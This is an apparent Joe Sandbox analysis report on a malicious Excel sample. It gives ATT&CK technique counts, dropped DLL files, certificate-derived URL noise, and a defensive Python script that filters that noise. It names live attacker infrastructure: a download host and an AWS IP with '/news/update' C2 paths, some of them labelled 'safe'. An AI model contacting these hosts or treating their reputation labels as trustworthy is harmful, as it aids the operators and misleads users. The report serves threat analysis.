Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E802845 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 11 | Path Interception | Process Injection 112 | Masquerading 121 | Input Capture 21 | System Time Discovery 2 | Remote Services | Input Capture 21 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution 43 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Security Software Discovery 12 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 11 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | System Information Discovery 24 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

      Behavior Graph


      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll | 0% | ReversingLabs | |
C:\Users\user\ndgfht.frg | 0% | ReversingLabs | |

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label | Link
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | 0% | URL Reputation | safe |
http://www.a-cert.at0E | 0% | URL Reputation | safe |
http://www.certplus.com/CRL/class3.crl0 | 0% | URL Reputation | safe |
http://www.e-me.lv/repository0 | 0% | URL Reputation | safe |
http://www.acabogacia.org/doc0 | 0% | URL Reputation | safe |
http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe |
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | 0% | URL Reputation | safe |
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | 0% | URL Reputation | safe |
http://www.certifikat.dk/repository0 | 0% | URL Reputation | safe |
http://www.chambersign.org1 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://www.pkioverheid.nl/policies/root-policy0 | 0% | URL Reputation | safe |
http://crl.ssc.lt/root-c/cacrl.crl0 | 0% | URL Reputation | safe |
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | 0% | URL Reputation | safe |
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | 0% | URL Reputation | safe |
http://ca.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe |
http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe |
http://repository.infonotary.com/cps/qcps.html0$ | 0% | URL Reputation | safe |
http://www.post.trust.ie/reposit/cps.html0 | 0% | URL Reputation | safe |
http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe |
http://www.disig.sk/ca/crl/ca_disig.crl0 | 0% | URL Reputation | safe |
http://ocsp.infonotary.com/responder.cgi0V | 0% | URL Reputation | safe |
http://www.sk.ee/cps/0 | 0% | URL Reputation | safe |
http://www.certicamara.com0 | 0% | URL Reputation | safe |

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
whiskyexpanse.com | 104.21.3.47 | true | false | | unknown
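Nearly every URL in the table above and in the "URLs from Memory and Binaries" table that follows is a CRL distribution point, OCSP responder or CPS pointer taken from CA root certificates that were mapped into rundll32.exe; the "URL Reputation: safe" verdicts on them say nothing about the sample. The odd trailing characters ("crl0", ".at0E", "qcps.html0$", ".org1") are not part of the URLs: in a DER-encoded certificate the string is followed by the next TLV, whose SEQUENCE (0x30, '0') or SET (0x31, '1') tag and length byte are printable, and the string scanner keeps them. The entries worth an analyst's time are the ones that come from a different memory region and do not look like certificate contents, such as the https://52.12.4.186/news/update variants, plus the contacted domain whiskyexpanse.com. The script below is an added example, not Joe Sandbox code: it strips the DER tail, groups rows by the memory dump they were lifted from, and demotes bare-host URLs that sit inside a region dominated by PKI strings. The path patterns and the Windows resource-host allowlist are analyst heuristics (assumptions), and the input is a constructed subset of the report's rows.

```python
"""Triage of the URL tables in this report: separates certificate-store
noise from URLs worth pivoting on.  Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed subset of (URL, source memory dump) pairs copied from the
# "URLs from Memory and Binaries" table; the report lists about ninety.
SAMPLE_ROWS = [
    ("http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0",
     "00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp"),
    ("http://www.a-cert.at0E",
     "00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp"),
    ("http://ocsp.infonotary.com/responder.cgi0V",
     "00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp"),
    ("http://www.chambersign.org1",
     "00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp"),
    ("http://www.ssc.lt/cps03",
     "00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp"),
    ("http://crl.entrust.net/2048ca.crl0",
     "00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp"),
    ("http://www.windows.com/pctv.",
     "00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp"),
    ("http://www.icra.org/vocabulary/.",
     "00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp"),
    ("https://52.12.4.186/h",
     "00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp"),
    ("https://52.12.4.186/news/update",
     "00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp"),
    ("https://52.12.4.186/news/updateA",
     "00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp"),
    ("http://www.%s.comPA",
     "00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp"),
]

# In a DER-encoded certificate the URL string is immediately followed by the
# next TLV.  Its tag is usually SEQUENCE (0x30 = '0') or SET (0x31 = '1') and
# the length byte after it is often printable too ('E' = 0x45, '$' = 0x24,
# 'V' = 0x56), which is why the scanner reports "...crl0", ".at0E", ".org1".
# Heuristic: strip only when the tag follows a letter or '/', so path
# segments that legitimately end in digits ("/repository/1604") survive.
DER_TAIL = re.compile(r"(?<=[A-Za-z/])[01][ -~]?$")

# Path shapes typical of CRL distribution points, OCSP responders and CPS
# pointers carried in CA certificates (analyst heuristic, not exhaustive).
PKI_HINT = re.compile(
    r"\.(crl|crt|cer)$|ocsp|"
    r"/(crl|cps|dpc|docs?|polic(y|ies)|repositor(y|io)|guidelines|CertEnroll)\b",
    re.I)

# Strings carried by stock Windows DLLs that appear in any process mapping
# them.  Analyst-maintained allowlist: an assumption, build yours from a
# clean baseline of the same OS image.
WINDOWS_RESOURCE_HOSTS = {"www.windows.com", "windowsmedia.com", "investor.msn.com",
                          "www.msnbc.com", "www.icra.org", "schemas.xmlsoap.org"}


def strip_der_tail(url: str) -> str:
    """Remove a trailing DER tag (+ optional length byte) glued to a URL."""
    return DER_TAIL.sub("", url)


def classify(url: str) -> str:
    """Label one URL: format-string, windows-resource, pki-noise or candidate."""
    parts = urlsplit(strip_der_tail(url))
    host = parts.hostname or ""
    if "%s" in host:            # printf template from a library, not a real URL
        return "format-string"
    if host in WINDOWS_RESOURCE_HOSTS:
        return "windows-resource"
    if PKI_HINT.search(host) or PKI_HINT.search(parts.path):
        return "pki-noise"
    return "candidate"


def triage(rows):
    """Group rows by memory region.  A region where at least half the URLs are
    PKI noise is a certificate blob, so bare-host URLs in it (CPS pointers
    such as www.a-cert.at) are demoted too.  Returns {dump: [(url, label)]}."""
    regions = defaultdict(list)
    for url, dump in rows:
        regions[dump].append((strip_der_tail(url), classify(url)))
    result = {}
    for dump, items in regions.items():
        noise = sum(label == "pki-noise" for _, label in items)
        if noise * 2 >= len(items):
            items = [(u, "pki-noise" if lbl == "candidate"
                      and not urlsplit(u).path.strip("/") else lbl)
                     for u, lbl in items]
        result[dump] = items
    return result


def candidates(rows):
    """Sorted, de-duplicated URLs that survive every filter."""
    return sorted({u for items in triage(rows).values()
                   for u, lbl in items if lbl == "candidate"})


if __name__ == "__main__":
    for dump, items in triage(SAMPLE_ROWS).items():
        print(dump.split(".")[3], [lbl for _, lbl in items])
    print("pivot on:", candidates(SAMPLE_ROWS))
```

Run against the twelve constructed rows, the whole 0x2430000 region collapses to PKI noise (including the bare hosts www.a-cert.at and www.chambersign.org), the Windows resource strings and the `%s` template drop out, and only the three 52.12.4.186 URLs remain for pivoting. The region rule is the part that generalises: when feeding the full table in, paste each row's source dump string unchanged, because clustering by region is what tells a CPS pointer apart from a bare C2 host.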

        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.a-cert.at0E | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-me.lv/repository0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org/doc0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersroot.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certifikat.dk/repository0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.chambersign.org1 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pkioverheid.nl/policies/root-policy0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://repository.swisssign.com/0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://crl.ssc.lt/root-c/cacrl.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class3P.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://repository.infonotary.com/cps/qcps.html0$ | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.post.trust.ie/reposit/cps.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certplus.com/CRL/class2.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca/crl/ca_disig.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.infonotary.com/responder.cgi0V | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sk.ee/cps/0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0= | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ssc.lt/cps03 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.windows.com/pctv. | rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp | false | | high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0= | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.pki.gva.es0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.oces.certifikat.dk/oces.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-b/cacrl.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/dpc/0Z | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://crl.pki.wellsfargo.com/wsprca.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.dnie.es/dpc0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.rootca.or.kr/rca/cps.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/guidelines0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.globaltrust.info0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://certificates.starfieldtech.com/repository/1604 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.certplus.com/CRL/class3TS.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.entrust.net/CRL/Client1.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.entrust.net/CRL/net1.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp | false | | high
https://www.catcert.net/verarrel | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.disig.sk/ca0f | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-szigno.hu/RootCA.crl | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.signatur.rtr.at/current.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.sk.ee/juur/crl/0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.chambersign.org/chambersignroot.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.quovadis.bm0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ssc.lt/root-a/cacrl.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.firmaprofesional.com0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.netlock.net/docs | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://52.12.4.186/h | rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp | false | | high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://cps.chambersign.org/cps/publicnotaryroot.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.e-trust.be/CPS/QNcerts | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/certicamaraca.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp | false | | high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://52.12.4.186/news/update6 | rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://cps.chambersign.org/cps/chambersroot.html0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.acabogacia.org0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://ca.sia.it/seccli/repository/CPS0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.securetrust.com/SGCA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.securetrust.com/STCA.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.certicamara.com/certicamaraca.crl0; | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.e-szigno.hu/RootCA.crt0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.quovadisglobal.com/cps0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp | false | | high
https://52.12.4.186/news/updateA | rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.valicert.com/1 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://52.12.4.186/news/update | rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e-szigno.hu/SZSZ/0 | rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp | false | URL Reputation: safe |
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://52.12.4.186/news/updateFrundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ocsp.quovadisoffshore.com0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://ocsp.entrust.net0Drundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://cps.chambersign.org/cps/chambersignroot.html0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://ca.sia.it/secsrv/repository/CRL.der0Jrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://investor.msn.comrundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpfalse
                                                high
                                                http://crl.entrust.net/server1.crl0rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.ancert.com/cps0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ca.sia.it/seccli/repository/CRL.der0Jrundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.registradores.org/scr/normativa/cp_f2.htm0rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpfalse
                                                    high

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.12.4.186 | unknown | United States | 16509 | AMAZON-02US | true
104.21.3.47 | whiskyexpanse.com | United States | 13335 | CLOUDFLARENETUS | false

Of these, 104.21.3.47 (whiskyexpanse.com, behind Cloudflare) is the host that served the ohior.dll download recorded under Created / dropped Files, and 52.12.4.186 (AWS) is the host in the https://52.12.4.186/news/update strings found in rundll32.exe memory, contacted by IP with no domain.

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:383422
                                                    Start date:07.04.2021
                                                    Start time:18:46:21
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 7m 43s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Documents_460000622_1464906353.xls
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.expl.evad.winXLS@7/12@1/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 21.2% (good quality ratio 19.9%)
                                                    • Quality average: 76.5%
                                                    • Quality standard deviation: 30.3%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .xls
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, WerFault.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 8.253.207.121, 8.241.83.126, 8.241.89.254, 8.238.85.126, 8.238.85.254, 23.0.174.193, 23.0.174.185, 23.0.174.187
